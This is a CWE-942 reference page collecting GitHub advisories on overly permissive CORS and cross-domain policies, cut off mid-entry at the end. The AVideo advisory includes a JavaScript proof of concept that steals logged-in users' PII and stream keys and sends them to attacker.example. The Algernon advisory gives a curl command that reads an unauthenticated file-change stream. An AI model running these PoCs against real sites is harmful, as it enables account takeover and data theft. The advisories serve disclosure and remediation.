CWE-942
AllowedPermissive Cross-domain Security Policy with Untrusted Domains
Abstraction: Variant · Status: Incomplete
The product uses a web-client protection mechanism such as a Content Security Policy (CSP) or cross-domain policy file, but the policy includes untrusted domains with which the web client is allowed to communicate.
176 vulnerabilities reference this CWE, most recent first.
GHSA-9QVW-GVQ6-G569
Vulnerability from github – Published: 2023-12-12 12:30 – Updated: 2024-10-08 09:30A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). When accessing the UMC Web-UI from affected products, UMC uses an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.
{
"affected": [],
"aliases": [
"CVE-2023-46281"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-12T12:15:13Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions \u003c V4.1), SINUMERIK Integrate RunMyHMI\u00a0/Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions \u003c V18 Update 3). When accessing the UMC Web-UI from affected products, UMC uses an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.",
"id": "GHSA-9qvw-gvq6-g569",
"modified": "2024-10-08T09:30:51Z",
"published": "2023-12-12T12:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46281"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-999588.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-999588.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-9V4J-7G44-QCQW
Vulnerability from github – Published: 2026-05-19 14:36 – Updated: 2026-05-19 14:36Summary
When auto-refresh is enabled, Algernon spins up an SSE handler that streams a data: line for every filesystem event under the watched directory. The handler performs no authentication of any kind — no shared token, no cookie check against the permissions2 userstate, no IP allow-list, no path-prefix permission. Any client that can complete a TCP connection to the listener address receives the stream.
This advisory covers the authentication gap in isolation. The cross-origin browser-reach (advisory #2b) and the network-reach (advisory #2c) amplify the impact, but each is independently fixable; this finding addresses the case where a same-origin or LAN-local client connects directly to the SSE port and reads the stream without proving anything about its identity.
Details
Root cause — the SSE handler does not consult permissions2 or any other auth
// vendor/github.com/xyproto/recwatch/eventserver.go:100-144 (1.17.6)
func GenFileChangeEvents(events TimeEventMap, mut *sync.Mutex, maxAge time.Duration, allowed string) http.HandlerFunc {
return func(w http.ResponseWriter, _ *http.Request) {
w.Header().Set("Content-Type", "text/event-stream;charset=utf-8")
w.Header().Set("Cache-Control", "no-cache")
w.Header().Set("Connection", "keep-alive")
w.Header().Set("Access-Control-Allow-Origin", allowed)
// ... loop emits one SSE record per filename touched ...
}
}
Note the handler signature: func(w http.ResponseWriter, _ *http.Request). The request is discarded — no Cookie, Authorization, query-string, or remote-IP check is performed before the stream begins.
In 1.17.6 the listener was placed on its own http.ServeMux (recwatch/eventserver.go:200-215), wholly outside the perm.Rejected middleware chain that gates Algernon's main HTTP listener. Even an operator who had configured admin/user path prefixes via perm.AddAdminPath, set a cookieSecret, and forced authentication on every URL of the main server had no way to gate this listener — it was unreachable from the mux argument the perm middleware uses.
Why authentication matters for this listener
The stream contents are not public data. They reveal:
- Which files the developer is actively editing, with sub-second timing precision.
- The existence of files inside the watched root (including files the operator may have meant to keep private —
.env.local,secrets.lua, in-progress draft files). - By inference, the directory layout of the project.
A client that can connect to the listener obtains a low-rate continuous information disclosure for the lifetime of the connection. The handler is an infinite for {} loop — there is no natural session boundary or expiry.
Source-level evidence
$ rg -n 'GenFileChangeEvents|EventServer\(' vendor/github.com/xyproto/recwatch/
vendor/github.com/xyproto/recwatch/eventserver.go:101:func GenFileChangeEvents(events TimeEventMap, mut *sync.Mutex, maxAge time.Duration, allowed string) http.HandlerFunc {
vendor/github.com/xyproto/recwatch/eventserver.go:177:func EventServer(path, allowed, eventAddr, eventPath string, refreshDuration time.Duration) {
$ rg -n 'Cookie|Authorization|Token|state\.User' vendor/github.com/xyproto/recwatch/eventserver.go
# zero matches — no authentication primitive is referenced anywhere in the file
PoC (against 1.17.6)
# 1. Operator runs algernon with auto-refresh on a project directory:
algernon -a /path/to/project # spins up :5553 on Linux/macOS, localhost:5553 on Windows
# 2. Any client that can reach the listener connects without credentials:
curl -sN http://<server>:5553/sse
# => id: 0
# data: /path/to/project/secret-notes.md
#
# id: 1
# data: /path/to/project/.env.local
No Cookie, no Authorization, no X-Token, no preflight, no challenge. The connection succeeds and the stream is delivered for as long as the client keeps the socket open.
Impact
- Confidentiality: medium. Continuous information disclosure of filenames and edit timing to anyone who can connect.
- Integrity: none.
- Availability: low. Each connection consumes a goroutine indefinitely; many simultaneous connections can exhaust descriptors.
Suggestions to fix
Primary fix — require a shared secret on the SSE endpoint. The auto-refresh feature already injects a script into served HTML (engine/sse.go:118-165); that script knows the SSE URL. Add a per-startup token, embed it in the injected JS, and require it on the SSE request:
// engine/sse.go -- in InsertAutoRefresh
tmplData.SessionToken = ac.sseToken // generated once at startup, e.g. crypto/rand 32 bytes
// JS:
// var source = new EventSource('...?token={{.SessionToken}}');
// recwatch handler:
// if subtle.ConstantTimeCompare([]byte(r.URL.Query().Get("token")),
// []byte(serverToken)) != 1 {
// http.Error(w, "forbidden", http.StatusForbidden); return
// }
Cookie-bearing requests work too if recwatch.EventServer is moved behind perm.Rejected (see "Defence in depth"). The token approach is the smaller change.
Defence in depth — mount the SSE handler on the main mux. Moving recwatch.EventServerHandler onto the main http.ServeMux automatically places the SSE handler behind whatever middleware the operator has configured — perm.Rejected, tollbooth, custom auth wrappers. This closes the same-origin half of the gap without a per-token implementation. Any dedicated-port path bypasses perm.Rejected because it uses its own http.ServeMux, and that path needs the token fix from "Primary fix" above.
Live verification
$ ./algernon.exe --nodb --httponly --server -a --addr 127.0.0.1:18781 --quiet poc2/site
$ ( curl -sN --max-time 4 http://127.0.0.1:5553/sse > stream.txt &
sleep 1
echo "edit-1" >> poc2/site/secret-notes.md
echo "edit-2" >> poc2/site/.env.local
wait )
$ cat stream.txt
id: 0
data: C:\Users\xbox\Desktop\VulnTesting\algernon-main\poc-test\poc2\site\secret-notes.md
id: 1
data: C:\Users\xbox\Desktop\VulnTesting\algernon-main\poc-test\poc2\site\.env.local
No Cookie, no Authorization header. Stream delivered.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.17.6"
},
"package": {
"ecosystem": "Go",
"name": "github.com/xyproto/algernon"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.17.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-200",
"CWE-306",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T14:36:34Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nWhen auto-refresh is enabled, Algernon spins up an SSE handler that streams a `data:` line for every filesystem event under the watched directory. The handler performs **no authentication** of any kind \u2014 no shared token, no cookie check against the `permissions2` userstate, no IP allow-list, no path-prefix permission. Any client that can complete a TCP connection to the listener address receives the stream.\n\nThis advisory covers the authentication gap in isolation. The cross-origin browser-reach (advisory #2b) and the network-reach (advisory #2c) amplify the impact, but each is independently fixable; this finding addresses the case where a same-origin or LAN-local client connects directly to the SSE port and reads the stream without proving anything about its identity.\n\n### Details\n\n#### Root cause \u2014 the SSE handler does not consult `permissions2` or any other auth\n\n```go\n// vendor/github.com/xyproto/recwatch/eventserver.go:100-144 (1.17.6)\nfunc GenFileChangeEvents(events TimeEventMap, mut *sync.Mutex, maxAge time.Duration, allowed string) http.HandlerFunc {\n return func(w http.ResponseWriter, _ *http.Request) {\n w.Header().Set(\"Content-Type\", \"text/event-stream;charset=utf-8\")\n w.Header().Set(\"Cache-Control\", \"no-cache\")\n w.Header().Set(\"Connection\", \"keep-alive\")\n w.Header().Set(\"Access-Control-Allow-Origin\", allowed)\n // ... loop emits one SSE record per filename touched ...\n }\n}\n```\n\nNote the handler signature: `func(w http.ResponseWriter, _ *http.Request)`. The request is discarded \u2014 no `Cookie`, `Authorization`, query-string, or remote-IP check is performed before the stream begins.\n\nIn 1.17.6 the listener was placed on its own `http.ServeMux` ([recwatch/eventserver.go:200-215](../vendor/github.com/xyproto/recwatch/eventserver.go)), wholly outside the `perm.Rejected` middleware chain that gates Algernon\u0027s main HTTP listener. Even an operator who had configured admin/user path prefixes via `perm.AddAdminPath`, set a `cookieSecret`, and forced authentication on every URL of the main server had no way to gate this listener \u2014 it was unreachable from the `mux` argument the perm middleware uses.\n\n#### Why authentication matters for this listener\n\nThe stream contents are not public data. They reveal:\n\n- Which files the developer is actively editing, with sub-second timing precision.\n- The existence of files inside the watched root (including files the operator may have meant to keep private \u2014 `.env.local`, `secrets.lua`, in-progress draft files).\n- By inference, the directory layout of the project.\n\nA client that can connect to the listener obtains a low-rate continuous information disclosure for the lifetime of the connection. The handler is an infinite `for {}` loop \u2014 there is no natural session boundary or expiry.\n\n#### Source-level evidence\n\n```text\n$ rg -n \u0027GenFileChangeEvents|EventServer\\(\u0027 vendor/github.com/xyproto/recwatch/\nvendor/github.com/xyproto/recwatch/eventserver.go:101:func GenFileChangeEvents(events TimeEventMap, mut *sync.Mutex, maxAge time.Duration, allowed string) http.HandlerFunc {\nvendor/github.com/xyproto/recwatch/eventserver.go:177:func EventServer(path, allowed, eventAddr, eventPath string, refreshDuration time.Duration) {\n\n$ rg -n \u0027Cookie|Authorization|Token|state\\.User\u0027 vendor/github.com/xyproto/recwatch/eventserver.go\n# zero matches \u2014 no authentication primitive is referenced anywhere in the file\n```\n\n### PoC (against 1.17.6)\n\n```bash\n# 1. Operator runs algernon with auto-refresh on a project directory:\nalgernon -a /path/to/project # spins up :5553 on Linux/macOS, localhost:5553 on Windows\n\n# 2. Any client that can reach the listener connects without credentials:\ncurl -sN http://\u003cserver\u003e:5553/sse\n# =\u003e id: 0\n# data: /path/to/project/secret-notes.md\n#\n# id: 1\n# data: /path/to/project/.env.local\n```\n\nNo `Cookie`, no `Authorization`, no `X-Token`, no preflight, no challenge. The connection succeeds and the stream is delivered for as long as the client keeps the socket open.\n\n### Impact\n\n- **Confidentiality:** medium. Continuous information disclosure of filenames and edit timing to anyone who can connect.\n- **Integrity:** none.\n- **Availability:** low. Each connection consumes a goroutine indefinitely; many simultaneous connections can exhaust descriptors.\n\n### Suggestions to fix\n\n**Primary fix \u2014 require a shared secret on the SSE endpoint.** The auto-refresh feature already injects a script into served HTML ([engine/sse.go:118-165](../engine/sse.go)); that script knows the SSE URL. Add a per-startup token, embed it in the injected JS, and require it on the SSE request:\n\n```go\n// engine/sse.go -- in InsertAutoRefresh\ntmplData.SessionToken = ac.sseToken // generated once at startup, e.g. crypto/rand 32 bytes\n\n// JS:\n// var source = new EventSource(\u0027...?token={{.SessionToken}}\u0027);\n\n// recwatch handler:\n// if subtle.ConstantTimeCompare([]byte(r.URL.Query().Get(\"token\")),\n// []byte(serverToken)) != 1 {\n// http.Error(w, \"forbidden\", http.StatusForbidden); return\n// }\n```\n\nCookie-bearing requests work too if `recwatch.EventServer` is moved behind `perm.Rejected` (see \"Defence in depth\"). The token approach is the smaller change.\n\n**Defence in depth \u2014 mount the SSE handler on the main mux.** Moving `recwatch.EventServerHandler` onto the main `http.ServeMux` automatically places the SSE handler behind whatever middleware the operator has configured \u2014 `perm.Rejected`, `tollbooth`, custom auth wrappers. This closes the same-origin half of the gap without a per-token implementation. Any dedicated-port path bypasses `perm.Rejected` because it uses its own `http.ServeMux`, and that path needs the token fix from \"Primary fix\" above.\n\n### Live verification\n\n```\n$ ./algernon.exe --nodb --httponly --server -a --addr 127.0.0.1:18781 --quiet poc2/site\n$ ( curl -sN --max-time 4 http://127.0.0.1:5553/sse \u003e stream.txt \u0026\n sleep 1\n echo \"edit-1\" \u003e\u003e poc2/site/secret-notes.md\n echo \"edit-2\" \u003e\u003e poc2/site/.env.local\n wait )\n$ cat stream.txt\nid: 0\ndata: C:\\Users\\xbox\\Desktop\\VulnTesting\\algernon-main\\poc-test\\poc2\\site\\secret-notes.md\n\nid: 1\ndata: C:\\Users\\xbox\\Desktop\\VulnTesting\\algernon-main\\poc-test\\poc2\\site\\.env.local\n```\n\nNo `Cookie`, no `Authorization` header. Stream delivered.",
"id": "GHSA-9v4j-7g44-qcqw",
"modified": "2026-05-19T14:36:34Z",
"published": "2026-05-19T14:36:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xyproto/algernon/security/advisories/GHSA-9v4j-7g44-qcqw"
},
{
"type": "PACKAGE",
"url": "https://github.com/xyproto/algernon"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Algernon: Auto-refresh SSE event server binds to all interfaces with Access-Control-Allow-Origin: * and no authentication"
}
GHSA-C8F3-GJ35-46CF
Vulnerability from github – Published: 2024-06-13 15:30 – Updated: 2024-06-13 15:30SCG Policy Manager, all versions, contains an overly permissive Cross-Origin Resource Policy (CORP) vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of malicious actions on the application in the context of the authenticated user.
{
"affected": [],
"aliases": [
"CVE-2024-37131"
],
"database_specific": {
"cwe_ids": [
"CWE-697",
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-13T15:15:52Z",
"severity": "HIGH"
},
"details": "SCG Policy Manager, all versions, contains an overly permissive Cross-Origin Resource Policy (CORP) vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of malicious actions on the application in the context of the authenticated user.",
"id": "GHSA-c8f3-gj35-46cf",
"modified": "2024-06-13T15:30:37Z",
"published": "2024-06-13T15:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37131"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000225956/dsa-2024-254-security-update-for-dell-secure-connect-gateway-policy-manager-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CCQ9-R5CW-5HWQ
Vulnerability from github – Published: 2026-04-14 23:18 – Updated: 2026-04-24 20:40Summary
The allowOrigin($allowAll=true) function in objects/functions.php reflects any arbitrary Origin header back in Access-Control-Allow-Origin along with Access-Control-Allow-Credentials: true. This function is called by both plugin/API/get.json.php and plugin/API/set.json.php — the primary API endpoints that handle user data retrieval, authentication, livestream credentials, and state-changing operations. Combined with the application's SameSite=None session cookie policy, any website can make credentialed cross-origin requests and read authenticated API responses, enabling theft of user PII, livestream keys, and performing state changes on behalf of the victim.
Details
The vulnerable code path is in objects/functions.php lines 2773-2791:
// objects/functions.php:2773
if ($allowAll) {
$requestOrigin = $_SERVER['HTTP_ORIGIN'] ?? '';
if (!empty($requestOrigin)) {
header('Access-Control-Allow-Origin: ' . $requestOrigin);
header('Access-Control-Allow-Credentials: true');
} else {
header('Access-Control-Allow-Origin: *');
}
// ... allows all methods and headers ...
return;
}
This is called unconditionally at the top of both API entry points:
// plugin/API/get.json.php:12
allowOrigin(true);
// plugin/API/set.json.php:12
allowOrigin(true);
The comment above the code claims "These endpoints return public ad XML and carry no session-sensitive data" — this is incorrect. The same allowOrigin(true) call gates the entire API surface.
The attack is enabled by the session cookie configuration at objects/include_config.php:144:
ini_set('session.cookie_samesite', 'None');
This ensures the browser sends the victim's session cookie on cross-origin requests, which the API then uses for authentication via $_SESSION['user']['id'] (in User::getId()).
When a logged-in user's session is present, the get_api_user endpoint (API.php:3009) returns full user data without sanitization for the user's own profile ($isViewingOwnProfile = true bypasses removeSensitiveUserFields), including:
- Email, full name, address, phone, birth date (PII)
- Admin status and permission flags
- Livestream server URL with embedded password (API.php:3059)
- Encrypted stream key (API.php:3063)
The recent fix in commit 986e64aad addressed CORS handling in the non-$allowAll path (null origin and trusted subdomains) but left this far more dangerous $allowAll=true path completely untouched.
PoC
Step 1: Host the following HTML on any domain (e.g., https://attacker.example):
<html>
<body>
<h1>AVideo CORS PoC</h1>
<script>
// Step 1: Steal user profile data (PII, admin status, stream keys)
fetch('https://TARGET/plugin/API/get.json.php?APIName=user', {
credentials: 'include'
})
.then(r => r.json())
.then(data => {
document.getElementById('result').textContent = JSON.stringify(data, null, 2);
// Exfiltrate to attacker server
navigator.sendBeacon('https://attacker.example/collect',
JSON.stringify({
email: data.user?.email,
name: data.user?.user,
isAdmin: data.user?.isAdmin,
streamKey: data.livestream?.key,
streamServer: data.livestream?.server
})
);
});
</script>
<pre id="result">Loading...</pre>
</body>
</html>
Step 2: Victim visits the attacker page while logged into the AVideo instance.
Step 3: The browser sends a credentialed cross-origin GET request to the API. The server responds with:
Access-Control-Allow-Origin: https://attacker.example
Access-Control-Allow-Credentials: true
Step 4: The attacker's JavaScript reads the full authenticated API response containing the victim's email, name, address, phone, admin status, livestream credentials, and stream keys.
Step 5 (optional escalation): The attacker can also invoke set.json.php endpoints to perform state changes on behalf of the victim.
Impact
- User PII theft: Email, full name, address, phone number, birth date of any logged-in user who visits an attacker-controlled page
- Account compromise: Livestream server credentials (including password) and stream keys are exposed, allowing stream hijacking
- Admin reconnaissance: Admin status and all permission flags are exposed, enabling targeted attacks on privileged accounts
- State modification: The
set.json.phpendpoint is equally affected, allowing attackers to perform write operations (video management, settings changes) on behalf of the victim - Mass exploitation: No per-user targeting required — a single attacker page can harvest data from every logged-in visitor
Recommended Fix
Replace the permissive origin reflection in allowOrigin() with validation against the site's configured domain. The $allowAll path should validate the origin the same way the non-$allowAll path does:
// objects/functions.php:2773 — replace the $allowAll block with:
if ($allowAll) {
$requestOrigin = $_SERVER['HTTP_ORIGIN'] ?? '';
if (!empty($requestOrigin)) {
// Validate origin against site domain before reflecting
$siteOrigin = '';
if (!empty($global['webSiteRootURL'])) {
$parsed = parse_url($global['webSiteRootURL']);
if (!empty($parsed['scheme']) && !empty($parsed['host'])) {
$siteOrigin = $parsed['scheme'] . '://' . $parsed['host'];
if (!empty($parsed['port'])) {
$siteOrigin .= ':' . $parsed['port'];
}
}
}
if ($requestOrigin === $siteOrigin) {
header('Access-Control-Allow-Origin: ' . $requestOrigin);
header('Access-Control-Allow-Credentials: true');
} else {
// For truly public resources (ad XML), allow without credentials
header('Access-Control-Allow-Origin: ' . $requestOrigin);
// Do NOT set Allow-Credentials for untrusted origins
}
} else {
header('Access-Control-Allow-Origin: *');
}
// ... rest of headers ...
}
Additionally, consider separating the truly public endpoints (VAST/VMAP ad XML) from the sensitive API endpoints so they can have different CORS policies, rather than sharing one permissive allowOrigin(true) call.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41056"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T23:18:19Z",
"nvd_published_at": "2026-04-21T23:16:20Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `allowOrigin($allowAll=true)` function in `objects/functions.php` reflects any arbitrary `Origin` header back in `Access-Control-Allow-Origin` along with `Access-Control-Allow-Credentials: true`. This function is called by both `plugin/API/get.json.php` and `plugin/API/set.json.php` \u2014 the primary API endpoints that handle user data retrieval, authentication, livestream credentials, and state-changing operations. Combined with the application\u0027s `SameSite=None` session cookie policy, any website can make credentialed cross-origin requests and read authenticated API responses, enabling theft of user PII, livestream keys, and performing state changes on behalf of the victim.\n\n## Details\n\nThe vulnerable code path is in `objects/functions.php` lines 2773-2791:\n\n```php\n// objects/functions.php:2773\nif ($allowAll) {\n $requestOrigin = $_SERVER[\u0027HTTP_ORIGIN\u0027] ?? \u0027\u0027;\n if (!empty($requestOrigin)) {\n header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n header(\u0027Access-Control-Allow-Credentials: true\u0027);\n } else {\n header(\u0027Access-Control-Allow-Origin: *\u0027);\n }\n // ... allows all methods and headers ...\n return;\n}\n```\n\nThis is called unconditionally at the top of both API entry points:\n\n```php\n// plugin/API/get.json.php:12\nallowOrigin(true);\n\n// plugin/API/set.json.php:12\nallowOrigin(true);\n```\n\nThe comment above the code claims \"These endpoints return public ad XML and carry no session-sensitive data\" \u2014 this is incorrect. The same `allowOrigin(true)` call gates the entire API surface.\n\nThe attack is enabled by the session cookie configuration at `objects/include_config.php:144`:\n\n```php\nini_set(\u0027session.cookie_samesite\u0027, \u0027None\u0027);\n```\n\nThis ensures the browser sends the victim\u0027s session cookie on cross-origin requests, which the API then uses for authentication via `$_SESSION[\u0027user\u0027][\u0027id\u0027]` (in `User::getId()`).\n\nWhen a logged-in user\u0027s session is present, the `get_api_user` endpoint (API.php:3009) returns full user data without sanitization for the user\u0027s own profile (`$isViewingOwnProfile = true` bypasses `removeSensitiveUserFields`), including:\n- Email, full name, address, phone, birth date (PII)\n- Admin status and permission flags\n- Livestream server URL with embedded password (API.php:3059)\n- Encrypted stream key (API.php:3063)\n\nThe recent fix in commit `986e64aad` addressed CORS handling in the non-`$allowAll` path (null origin and trusted subdomains) but left this far more dangerous `$allowAll=true` path completely untouched.\n\n## PoC\n\n**Step 1:** Host the following HTML on any domain (e.g., `https://attacker.example`):\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003ch1\u003eAVideo CORS PoC\u003c/h1\u003e\n\u003cscript\u003e\n// Step 1: Steal user profile data (PII, admin status, stream keys)\nfetch(\u0027https://TARGET/plugin/API/get.json.php?APIName=user\u0027, {\n credentials: \u0027include\u0027\n})\n.then(r =\u003e r.json())\n.then(data =\u003e {\n document.getElementById(\u0027result\u0027).textContent = JSON.stringify(data, null, 2);\n // Exfiltrate to attacker server\n navigator.sendBeacon(\u0027https://attacker.example/collect\u0027,\n JSON.stringify({\n email: data.user?.email,\n name: data.user?.user,\n isAdmin: data.user?.isAdmin,\n streamKey: data.livestream?.key,\n streamServer: data.livestream?.server\n })\n );\n});\n\u003c/script\u003e\n\u003cpre id=\"result\"\u003eLoading...\u003c/pre\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n**Step 2:** Victim visits the attacker page while logged into the AVideo instance.\n\n**Step 3:** The browser sends a credentialed cross-origin GET request to the API. The server responds with:\n```\nAccess-Control-Allow-Origin: https://attacker.example\nAccess-Control-Allow-Credentials: true\n```\n\n**Step 4:** The attacker\u0027s JavaScript reads the full authenticated API response containing the victim\u0027s email, name, address, phone, admin status, livestream credentials, and stream keys.\n\n**Step 5 (optional escalation):** The attacker can also invoke `set.json.php` endpoints to perform state changes on behalf of the victim.\n\n## Impact\n\n- **User PII theft**: Email, full name, address, phone number, birth date of any logged-in user who visits an attacker-controlled page\n- **Account compromise**: Livestream server credentials (including password) and stream keys are exposed, allowing stream hijacking\n- **Admin reconnaissance**: Admin status and all permission flags are exposed, enabling targeted attacks on privileged accounts\n- **State modification**: The `set.json.php` endpoint is equally affected, allowing attackers to perform write operations (video management, settings changes) on behalf of the victim\n- **Mass exploitation**: No per-user targeting required \u2014 a single attacker page can harvest data from every logged-in visitor\n\n## Recommended Fix\n\nReplace the permissive origin reflection in `allowOrigin()` with validation against the site\u0027s configured domain. The `$allowAll` path should validate the origin the same way the non-`$allowAll` path does:\n\n```php\n// objects/functions.php:2773 \u2014 replace the $allowAll block with:\nif ($allowAll) {\n $requestOrigin = $_SERVER[\u0027HTTP_ORIGIN\u0027] ?? \u0027\u0027;\n if (!empty($requestOrigin)) {\n // Validate origin against site domain before reflecting\n $siteOrigin = \u0027\u0027;\n if (!empty($global[\u0027webSiteRootURL\u0027])) {\n $parsed = parse_url($global[\u0027webSiteRootURL\u0027]);\n if (!empty($parsed[\u0027scheme\u0027]) \u0026\u0026 !empty($parsed[\u0027host\u0027])) {\n $siteOrigin = $parsed[\u0027scheme\u0027] . \u0027://\u0027 . $parsed[\u0027host\u0027];\n if (!empty($parsed[\u0027port\u0027])) {\n $siteOrigin .= \u0027:\u0027 . $parsed[\u0027port\u0027];\n }\n }\n }\n if ($requestOrigin === $siteOrigin) {\n header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n header(\u0027Access-Control-Allow-Credentials: true\u0027);\n } else {\n // For truly public resources (ad XML), allow without credentials\n header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n // Do NOT set Allow-Credentials for untrusted origins\n }\n } else {\n header(\u0027Access-Control-Allow-Origin: *\u0027);\n }\n // ... rest of headers ...\n}\n```\n\nAdditionally, consider separating the truly public endpoints (VAST/VMAP ad XML) from the sensitive API endpoints so they can have different CORS policies, rather than sharing one permissive `allowOrigin(true)` call.",
"id": "GHSA-ccq9-r5cw-5hwq",
"modified": "2026-04-24T20:40:43Z",
"published": "2026-04-14T23:18:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ccq9-r5cw-5hwq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41056"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/caf705f38eae0ccfac4c3af1587781355d24495e"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "WWBN AVideo has CORS Origin Reflection with Credentials on Sensitive API Endpoints Enables Cross-Origin Account Takeover"
}
GHSA-CVV3-VCH8-MP39
Vulnerability from github – Published: 2024-08-02 00:31 – Updated: 2024-08-02 00:31Under certain circumstances the ExacqVision Web Services does not provide sufficient protection from untrusted domains.
{
"affected": [],
"aliases": [
"CVE-2024-32862"
],
"database_specific": {
"cwe_ids": [
"CWE-697",
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-01T22:15:24Z",
"severity": "MODERATE"
},
"details": "Under certain circumstances the ExacqVision Web Services does not provide sufficient protection from untrusted domains.",
"id": "GHSA-cvv3-vch8-mp39",
"modified": "2024-08-02T00:31:25Z",
"published": "2024-08-02T00:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32862"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-02"
},
{
"type": "WEB",
"url": "https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F4W8-52PM-GHR9
Vulnerability from github – Published: 2024-02-02 03:30 – Updated: 2024-02-02 03:30IBM PowerSC 1.3, 2.0, and 2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 275130.
{
"affected": [],
"aliases": [
"CVE-2023-50940"
],
"database_specific": {
"cwe_ids": [
"CWE-697",
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-02T01:15:08Z",
"severity": "MODERATE"
},
"details": "IBM PowerSC 1.3, 2.0, and 2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 275130.\n\n",
"id": "GHSA-f4w8-52pm-ghr9",
"modified": "2024-02-02T03:30:32Z",
"published": "2024-02-02T03:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50940"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275130"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7113759"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FQ2G-WF56-3PRG
Vulnerability from github – Published: 2026-06-30 21:31 – Updated: 2026-06-30 21:31IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.6, and 8.2 through 8.2.1.0 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains.
{
"affected": [],
"aliases": [
"CVE-2026-12084"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
